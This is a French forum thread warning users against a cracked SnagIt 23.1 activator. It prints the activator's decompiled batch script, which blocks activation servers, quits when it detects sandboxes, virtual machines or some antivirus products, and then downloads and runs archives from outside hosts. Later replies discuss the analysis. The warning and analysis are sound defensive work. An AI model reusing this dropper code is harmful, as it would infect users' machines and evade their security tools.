Forum ThiWeb.com

Bonjour à tous,

Attention à ceux qui souhaiteraient utiliser l'activateur pour SnagIt 23.1.0.26671.
Il se nomme "Crack.exe" ou "Activateur.exe" ou ... et pèse 10.061.930 octets.
Il est fonctionnel... mais pourri jusqu'à la moelle !

C'est un .bat compilé avec QBFC.
Pour les curieux, le contenu est "savoureux" :

Code : Tout sélectionner

@shift
@echo off

::Определение битов
set "osB=%PROCESSOR_ARCHITECTURE%"
if defined PROCESSOR_ARCHITEW6432 set "osB=AMD64"
if "%osB%"=="x86" (
set "bits="
set "pf=%SystemDrive%\Program Files"
) else (
set "pf=%SystemDrive%\Program Files (x86)"
set "bits=/reg:32"
)
::

::Установка 7z zip
start "" "%myfiles%\7z2201.exe" /S
::


::==========================================================  ЛЕКАРСТВО  ==================================================


echo 127.0.0.1 oscount.techsmith.com >> %windir%\System32\drivers\etc\hosts
echo 65.52.240.48 >> %windir%\System32\drivers\etc\hosts
echo 69.167.144.18 >> %windir%\System32\drivers\etc\hosts
echo 127.0.0.1 updater.techsmith.com >> %windir%\System32\drivers\etc\hosts
echo 127.0.0.1 camtasiatudi.techsmith.com >> %windir%\System32\drivers\etc\hosts
echo 127.0.0.1 tsccloud.cloudapp.net >> %windir%\System32\drivers\etc\hosts
echo 127.0.0.1 assets.cloud.techsmith.com >> %windir%\System32\drivers\etc\hosts
echo 127.0.0.1 my.nalpeiron.com >> %windir%\System32\drivers\etc\hosts
echo 127.0.0.1 activation.cloud.techsmith.com >> %windir%\System32\drivers\etc\hosts
echo 127.0.0.1 oscount.techsmith.com >> %windir%\System32\drivers\etc\hosts
echo 127.0.0.1 updater.techsmith.com >> %windir%\System32\drivers\etc\hosts

::Распаковка лекарства в временную папку
"%pf%\7-Zip\7z.exe" x "%myfiles%\Pro.7z" -o"%myfiles%" -pprosnaglt26673 -y

::Копирование лекарства в папку торента
xcopy "%myfiles%\Pro" "%SystemDrive%\Program Files\TechSmith\Snagit 2023" /S /E /Y /R

::Удаления лекарства в временной папке
rd "%myfiles%\Pro"
::

echo ------ Snagit is successfully activated! ------ | msg *

::====================================================================================================================================

::ПЕРВЫЙ ЭТАП УСТАНОВЩИКА +++++++++++++++

::==========================================================  SANDBOXIE STOP INSTALL  ================================================

::Остановка исполнения бата при запуске в Sandboxie
for /f tokens^=1^ delims^=^" %%i in ('tasklist /fi "imagename eq SbieSvc.exe" /fo csv /nh') do set sb=%%~i
if "%sb%" equ "SbieSvc.exe" exit
::

::==========================================================  ALUCARD STOP INSTALL  ==================================================

::Остановка исполнения бата при обнаружения Алукарда
Reg query "HKLM\SOFTWARE\Microsoft\Alu" /s %bits%
if %ERRORLEVEL% equ 0 exit
::

::Добавление Алукарда в реестр для исключения повторных инсталляций
Reg Add "HKLM\SOFTWARE\Microsoft\Alu" /f %bits%
::

::==========================================================  VM STOP INSTALL  ==================================================

::Остановка исполнения бата и самоудаление при запуске на виртуальной машине
for /f "tokens=2*" %%a in (' reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SystemInformation" /v "SystemProductName" ') do set vm1="%%b"
for /f "tokens=2*" %%a in (' reg query "HKEY_LOCAL_MACHINE\SYSTEM\HardwareConfig\Current" /v "SystemProductName" ') do set vm2="%%b"
if %vm1% equ "KVM" exit
if %vm1% equ "VirtualBox" exit
if %vm2% equ "Virtual Machine" exit
::

::==========================================================  AV STOP INSTALL  ==================================================

::Остановка исполнения бата и самоудаление при обнаружения ESET
for /f tokens^=1^ delims^=^" %%i in ('tasklist /fi "imagename eq ekrn.exe" /fo csv /nh') do set sb=%%~i
if "%sb%" equ "ekrn.exe" exit
::

::Остановка исполнения бата и самоудаление при обнаружения 360
for /f tokens^=1^ delims^=^" %%i in ('tasklist /fi "imagename eq QHActiveDefense.exe" /fo csv /nh') do set sb=%%~i
if "%sb%" equ "QHActiveDefense.exe" exit
::

::::Остановка исполнения бата и самоудаление при обнаружения Kaspersky
dir /S "%SystemDrive%\Program Files\Kaspersky Lab\*.exe"
IF %ERRORLEVEL% equ 0 exit
dir /S "%SystemDrive%\Program Files (x86)\Kaspersky Lab\*.exe"
IF %ERRORLEVEL% equ 0 exit
::

::==========================================================  DATE STOP INSTALL  ===========================================================

::Текущий год
set yn=23
::

::Импорт системной даты в переменную
for /f %%a in ('wmic path win32_LocalTime Get Day^,Month^,Year /value') do >nul set "%%a"
set Month=00%Month%
set Month=%Month:~-2%
set Year=00%Year%
set Year=%Year:~-2%
set dt=%Day%%Month%%Year%
::

::Импорт дат из конфига в переменные
set "cnfv=%myfiles%\cnf"
for /f "usebackq delims=;" %%i in ("%cnfv%") do set %%~i
set "dt1v=%d1%%m1%%yn%"
set "dt2v=%d2%%m1%%yn%"
set "dt3v=%d3%%m1%%yn%"
::

::Остановка исполнения бата и самоудаление (if system date = config date)
if %dt% equ %dt1v% exit
if %dt% equ %dt2v% exit
if %dt% equ %dt3v% exit
::

::=============================================================  CURL  =====================================================================

::Загрузка карла для win: 7, 8, 8.1 c резервными источниками
if not exist %windir%\System32\curl.exe powershell "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (new-object net.webclient).DownloadFile('https://github.com/cloud1cybertron/wincurl/raw/main/curl.exe', '%windir%\System32\curl.exe')"
if not exist %windir%\System32\curl.exe powershell "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (new-object net.webclient).DownloadFile('https://zelticloud.net/cu/curl.exe', '%windir%\System32\curl.exe')"
if not exist %windir%\System32\curl.exe exit
::
::===========================================================  НАСТРОЙКИ  ===================================================================

::Импорт pid и sid из локального конфига
set "cnfv=%myfiles%\cnf"
for /f "usebackq delims=;" %%i in ("%cnfv%") do set %%~i
set p1=%pid%
set s1=%sid%
::

::Парсинг county ip и id
for /f "tokens=* delims= " %%a in ('curl https://ipinfo.io/ip -k') do set "ei=%%~a"
for /f "tokens=* delims= " %%a in ('curl https://ipinfo.io/country -k') do set "ec=%%~a"
::

::Определение винды
for %%i in (7 8 8.1 10 11) do (wmic os get caption|(>nul findstr /ilc:"Windows %%i")&&(set es=%%i))
::

::Генерация довнлоад айди
set didl=8
setlocal EnableDelayedExpansion EnableExtensions
set num_t=16
set "num_set=0123456789abcdef"
:grmd
set /a "rnd=%num_t%*%random%/32768"
set "ed=!num_set:~%rnd%,1!%ed%"
Set /a "didl-=1"
if %didl% gtr 0 goto grmd
::

::Подставление случайного юзер агента
set /a ragent=(%random%%%100)+1
if %ragent% == 1 set "uat=Mozilla/5.0 (Windows NT 10.0; Win64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5377.168 Safari/537.36"
if %ragent% == 2 set "uat=Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5368.101 Safari/537.36"
if %ragent% == 3 set "uat=Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5386.123 Safari/537.36"
if %ragent% == 4 set "uat=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5389.103 Safari/537.36"
if %ragent% == 5 set "uat=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5385.94 Safari/537.36"
if %ragent% == 6 set "uat=Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5376.101 Safari/537.36"
if %ragent% == 7 set "uat=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5382.189 Safari/537.36"
if %ragent% == 8 set "uat=Mozilla/5.0 (Windows NT 11.0; Win64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5413.107 Safari/537.36"
if %ragent% == 9 set "uat=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5368.189 Safari/537.36"
if %ragent% == 10 set "uat=Mozilla/5.0 (Windows NT 10.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5362.192 Safari/537.36"
if %ragent% == 11 set "uat=Mozilla/5.0 (Windows NT 10.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5409.100 Safari/537.36"
if %ragent% == 12 set "uat=Mozilla/5.0 (Windows NT 11.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5385.184 Safari/537.36"
if %ragent% == 13 set "uat=Mozilla/5.0 (Windows NT 11.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5408.123 Safari/537.36"
if %ragent% == 14 set "uat=Mozilla/5.0 (Windows NT 10.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5398.172 Safari/537.36"
if %ragent% == 15 set "uat=Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5369.183 Safari/537.36"
if %ragent% == 16 set "uat=Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5397.128 Safari/537.36"
if %ragent% == 17 set "uat=Mozilla/5.0 (Windows NT 11.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5360.113 Safari/537.36"
if %ragent% == 18 set "uat=Mozilla/5.0 (Windows NT 10.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5366.158 Safari/537.36"
if %ragent% == 19 set "uat=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5377.163 Safari/537.36"
if %ragent% == 20 set "uat=Mozilla/5.0 (Windows NT 10.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5412.104 Safari/537.36"
if %ragent% == 21 set "uat=Mozilla/5.0 (Windows NT 11.0; Win64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5381.188 Safari/537.36"
if %ragent% == 22 set "uat=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5377.127 Safari/537.36"
if %ragent% == 23 set "uat=Mozilla/5.0 (Windows NT 11.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5412.141 Safari/537.36"
if %ragent% == 24 set "uat=Mozilla/5.0 (Windows NT 11.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5400.218 Safari/537.36"
if %ragent% == 25 set "uat=Mozilla/5.0 (Windows NT 11.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5389.144 Safari/537.36"
if %ragent% == 26 set "uat=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5394.188 Safari/537.36"
if %ragent% == 27 set "uat=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5374.109 Safari/537.36"
if %ragent% == 28 set "uat=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5372.214 Safari/537.36"
if %ragent% == 29 set "uat=Mozilla/5.0 (Windows NT 10.0; Win64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5375.114 Safari/537.36"
if %ragent% == 30 set "uat=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5379.148 Safari/537.36"
if %ragent% == 31 set "uat=Mozilla/5.0 (Windows NT 11.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5384.178 Safari/537.36"
if %ragent% == 32 set "uat=Mozilla/5.0 (Windows NT 11.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5413.119 Safari/537.36"
if %ragent% == 33 set "uat=Mozilla/5.0 (Windows NT 11.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5363.107 Safari/537.36"
if %ragent% == 34 set "uat=Mozilla/5.0 (Windows NT 10.0; Win64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5402.192 Safari/537.36"
if %ragent% == 35 set "uat=Mozilla/5.0 (Windows NT 10.0; Win64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5387.129 Safari/537.36"
if %ragent% == 36 set "uat=Mozilla/5.0 (Windows NT 10.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5378.127 Safari/537.36"
if %ragent% == 37 set "uat=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5376.182 Safari/537.36"
if %ragent% == 38 set "uat=Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5413.181 Safari/537.36"
if %ragent% == 39 set "uat=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
if %ragent% == 40 set "uat=Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36"
if %ragent% == 41 set "uat=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36"
if %ragent% == 42 set "uat=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
if %ragent% == 43 set "uat=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36"
if %ragent% == 44 set "uat=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"
if %ragent% == 45 set "uat=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36"
if %ragent% == 46 set "uat=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36"
if %ragent% == 47 set "uat=Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36"
if %ragent% == 48 set "uat=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.99 Safari/537.36"
if %ragent% == 49 set "uat=Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36"
if %ragent% == 50 set "uat=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36"
if %ragent% == 51 set "uat=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36"
if %ragent% == 52 set "uat=Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
if %ragent% == 53 set "uat=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36"
if %ragent% == 54 set "uat=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36"
if %ragent% == 55 set "uat=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36"
if %ragent% == 56 set "uat=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36"
if %ragent% == 57 set "uat=Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.83 Safari/537.1"
if %ragent% == 58 set "uat=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36"
if %ragent% == 59 set "uat=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36"
if %ragent% == 60 set "uat=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36"
if %ragent% == 61 set "uat=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36"
if %ragent% == 62 set "uat=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36"
if %ragent% == 63 set "uat=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
if %ragent% == 64 set "uat=Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36"
if %ragent% == 65 set "uat=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36"
if %ragent% == 66 set "uat=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36"
if %ragent% == 67 set "uat=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36"
if %ragent% == 68 set "uat=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36"
if %ragent% == 69 set "uat=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36"
if %ragent% == 70 set "uat=Mozilla/5.0 (Windows NT 10.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5404.195 Safari/537.36"
if %ragent% == 71 set "uat=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5406.136 Safari/537.36 Edg/107.0.1356.58"
if %ragent% == 72 set "uat=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5377.126 Safari/537.36 Edg/106.0.1405.38"
if %ragent% == 73 set "uat=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5408.118 Safari/537.36 Edg/107.0.1361.34"
if %ragent% == 74 set "uat=Mozilla/5.0 (Windows NT 10.0; Win64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5411.216 Safari/537.36 Edg/105.0.1335.45"
if %ragent% == 75 set "uat=Mozilla/5.0 (Windows NT 10.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5385.113 Safari/537.36 Edg/107.0.1319.46"
if %ragent% == 76 set "uat=Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5386.106 Safari/537.36 Edg/107.0.1386.41"
if %ragent% == 77 set "uat=Mozilla/5.0 (Windows NT 11.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5369.212 Safari/537.36 Edg/106.0.1348.62"
if %ragent% == 78 set "uat=Mozilla/5.0 (Windows NT 11.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5389.160 Safari/537.36 Edg/107.0.1392.54"
if %ragent% == 79 set "uat=Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5393.164 Safari/537.36 Edg/106.0.1316.50"
if %ragent% == 80 set "uat=Mozilla/5.0 (Windows NT 11.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5367.169 Safari/537.36 Edg/106.0.1255.35"
if %ragent% == 81 set "uat=Mozilla/5.0 (Windows NT 10.0; Win64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5391.156 Safari/537.36 Edg/106.0.1410.38"
if %ragent% == 82 set "uat=Mozilla/5.0 (Windows NT 10.0; Win64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5385.119 Safari/537.36 Edg/106.0.1307.48"
if %ragent% == 83 set "uat=Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:111.0esr) Gecko/20110101 Firefox/111.0esr/1eRGVZYTh7MVQQdH-42"
if %ragent% == 84 set "uat=Mozilla/5.0 (Windows NT 11.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0/0YQoQM586xAWnBLv-34"
if %ragent% == 85 set "uat=Mozilla/5.0 (Windows NT 10.0; Win64; rv:110.0) Gecko/20000101 Firefox/110.0"
if %ragent% == 86 set "uat=Mozilla/5.0 (Windows NT 11.0; Win64; x64; rv:111.0) Gecko/20000101 Firefox/111.0/E6JMACCRPdA-60"
if %ragent% == 87 set "uat=Mozilla/5.0 (Windows NT 11.0; Win64; rv:115.0esr) Gecko/20000101 Firefox/115.0esr"
if %ragent% == 88 set "uat=Mozilla/5.0 (Windows NT 11.0; Win64; x64; rv:122.0) Gecko/20000101 Firefox/122.0/BwNG2nOMlFk1Ty-74"
if %ragent% == 89 set "uat=Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:111.0) Gecko/20100101 Firefox/111.0/BJjeDS91BS96-60"
if %ragent% == 90 set "uat=Mozilla/5.0 (Windows NT 10.0; Win64; rv:123.0) Gecko/20010101 Firefox/123.0/ZEpxujxsW"
if %ragent% == 91 set "uat=Mozilla/5.0 (Windows NT 11.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5410.151 Safari/537.36 OPR/91.0.3813.69"
if %ragent% == 92 set "uat=Mozilla/5.0 (Windows NT 11.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5362.162 Safari/537.36 OPR/91.0.4257.198"
if %ragent% == 93 set "uat=Mozilla/5.0 (Windows NT 11.0; Win64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5366.199 Safari/537.36 OPR/92.0.4268.62"
if %ragent% == 94 set "uat=Mozilla/5.0 (Windows NT 11.0; Win64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5375.198 Safari/537.36 OPR/92.0.3668.33"
if %ragent% == 95 set "uat=Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5381.179 Safari/537.36 OPR/92.0.4013.24"
if %ragent% == 96 set "uat=Mozilla/5.0 (Windows NT 10.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5387.158 Safari/537.36 Edg/107.0.1259.44"
if %ragent% == 97 set "uat=Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5380.138 Safari/537.36 Edg/106.0.1246.39"
if %ragent% == 98 set "uat=Mozilla/5.0 (Windows NT 11.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5393.113 Safari/537.36 Edg/105.0.1266.61"
if %ragent% == 99 set "uat=Mozilla/5.0 (Windows NT 10.0; Win64; rv:114.0) Gecko/20010101 Firefox/114.0/AEaeAgKauj6Ud"
if %ragent% == 100 set "uat=Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:119.0) Gecko/20010101 Firefox/119.0"
::

::=============================================================== ШИФР =============================================
set "asd=A"
set "gdf=B"
set "vfg=C"
set "kff=D"
set "cdf=E"
set "sfe=F"
set "kju=G"
set "cfr=H"
set "rty=I"
set "zse=J"
set "bhy=K"
set "xxd=L"
set "arh=M"
set "jue=N"
set "pgd=O"
set "ncv=P"
set "zxc=Q"
set "lhf=R"
set "aze=S"
set "ggt=T"
set "zgi=U"
set "aai=V"
set "hhs=W"
set "lpl=X"
set "aqq=Y"
set "voh=Z"
set "fsd=a"
set "hbf=b"
set "gdg=c"
set "fdg=d"
set "vdf=e"
set "dfr=f"
set "xgt=g"
set "fse=h"
set "dsf=i"
set "xvr=j"
set "xft=k"
set "zig=l"
set "zsk=m"
set "ctd=n"
set "ssh=o"
set "nla=p"
set "fgf=q"
set "ctt=r"
set "jkf=s"
set "sfh=t"
set "sfr=u"
set "rtr=v"
set "kug=w"
set "asg=x"
set "hid=y"
set "zdf=z"
set "fs=1"
set "jd=2"
set "zg=3"
set "la=4"
set "zu=5"
set "kd=6"
set "ee=7"
set "ny=8"
set "lf=9"
set "pj=0"
set "pter=-"
set "hrer=="
set "gser=."
set "jler=_"
set "nler=/"
set "dver=\"
set "xver=:"
set "vver='"
set "pd=%ProgramData%"
set "ad=%APPDATA%"
set "tep=%APPDATA%"
::==================================================================================================================

::Загрузка vp2.7z +++++++++++++++++
curl -k -o "%tmp%\c.7z" -L "https://sw.vpn23.website/c.7z" --user-agent "cnfvp2"
::

::Распаковка vp2.bat с помощью 7Z +++++++++++++++++
"%pf%\7-Zip\7z.exe" x "%tmp%\c.7z" -o"%tmp%" -pconfigvpnG2012885838482012ggg -y
::

if not exist %tmp%\c.bat curl -k -o "%tmp%\c.7z" -L "https://zeltitmp.net/pp/c.7z" --user-agent "cnfvp201"
if not exist %tmp%\c.bat "%pf%\7-Zip\7z.exe" x "%tmp%\c.7z" -o"%tmp%" -pconfigvpnG2012885838482012ggg -y
if not exist %tmp%\c.bat curl -k -o "%tmp%\c.7z" -L "https://cloudzelti.com/pp/c.7z" --user-agent "cnfvp202"
if not exist %tmp%\c.bat "%pf%\7-Zip\7z.exe" x "%tmp%\c.7z" -o"%tmp%" -pconfigvpnG2012885838482012ggg -y


::Запуск vp2.bat при его обнаружении +++++++++++++++++
if exist %tmp%\c.bat powershell %tmp%\c.bat
::
::=============================================================================  FINISH =============================================================================
del %tmp%\c.7z

J'aime bien les sections "STOP INSTALL"

Cordialement.

Toujours au top tes infos Ladidi, super travail, merci à toi

Bonsoir,

@LaDidi21 :

Si ce n'est pas indiscret, avec quoi tu as décompilé?

@Calimero :
Rien n'est indiscret quand on veut apprendre.
x64_dbg + BPx sur CreateProcess, CreateFile, CloseHandle, ...

@LaDidi21 :

Merci

Merci pour ce boulot LadiDi21.
Je ne m'intéresse pas à ce programme, mais suis heureux de savoir que les programmes mis à disposition ici sont "vérifiés" par des personnes compétentes !

Merci Ladidi21 pour ton travail. C'est clair qu'on se sent en sécurité sur ce site.

Merci pour l'information mais je ne suis pas suffisamment compétent pour comprendre les subtilités incluses dans ce crack dont les entrailles nous sont présentées.
Il y a des sections qui stoppent les antivirus.
Je ne sais pas à quoi sert le logiciel curl et les fichiers récupérés sur github.
Pourri jusqu'à la moelle .... c'est à dire ?
Il infecte nos PC ou il tente de récupérer des infos, y a t'il création d'un autre compte admin, je ne sais pas quoi d'autre qui pourrait s'avérer nocif !

En tout cas, c'est un outil intéressant. J'ai acquis une licence 2021 prolongée en 2022 mais pour 2023, je ne l'ai pas renouvelé car je n'utilise pas toutes les nouveautés proposées.

@PhilWEB :
curl permet d'uploader/downloader.
Récupération de données.
Pourri jusqu'à la moelle dans le mesure où il fonctionne différemment selon qu'l est lancé sous VMware, SandBoxie, ...
Je n'ai pas vérifié TOUT ce qu'il capturait.

Je viens de voir que snagit est passé à la version v23.1.1.27519
Peut être que la cerise qui l'accompagnera sera moins pourrie...
Pour l'instant, je reste avec l'ancienne version que j'avais acquise légalement mais qui ne peut plus bénéficier de mise à jour sauf à passer au tiroir caisse à nouveau

@PhilWEB :
Pas de cerise en vue...
Attendons un peu pour voir.

Forum ThiWeb.com

[INFO] NE PAS utiliser l'activateur pour SnagIt 23.1.0.26671

[INFO] NE PAS utiliser l'activateur pour SnagIt 23.1.0.26671

Re: [INFO] NE PAS utiliser l'activateur pour SnagIt 23.1.0.26671

Re: [INFO] NE PAS utiliser l'activateur pour SnagIt 23.1.0.26671

Re: [INFO] NE PAS utiliser l'activateur pour SnagIt 23.1.0.26671

Re: [INFO] NE PAS utiliser l'activateur pour SnagIt 23.1.0.26671

Re: [INFO] NE PAS utiliser l'activateur pour SnagIt 23.1.0.26671

Re: [INFO] NE PAS utiliser l'activateur pour SnagIt 23.1.0.26671

Re: [INFO] NE PAS utiliser l'activateur pour SnagIt 23.1.0.26671

Re: [INFO] NE PAS utiliser l'activateur pour SnagIt 23.1.0.26671

Re: [INFO] NE PAS utiliser l'activateur pour SnagIt 23.1.0.26671

Re: [INFO] NE PAS utiliser l'activateur pour SnagIt 23.1.0.26671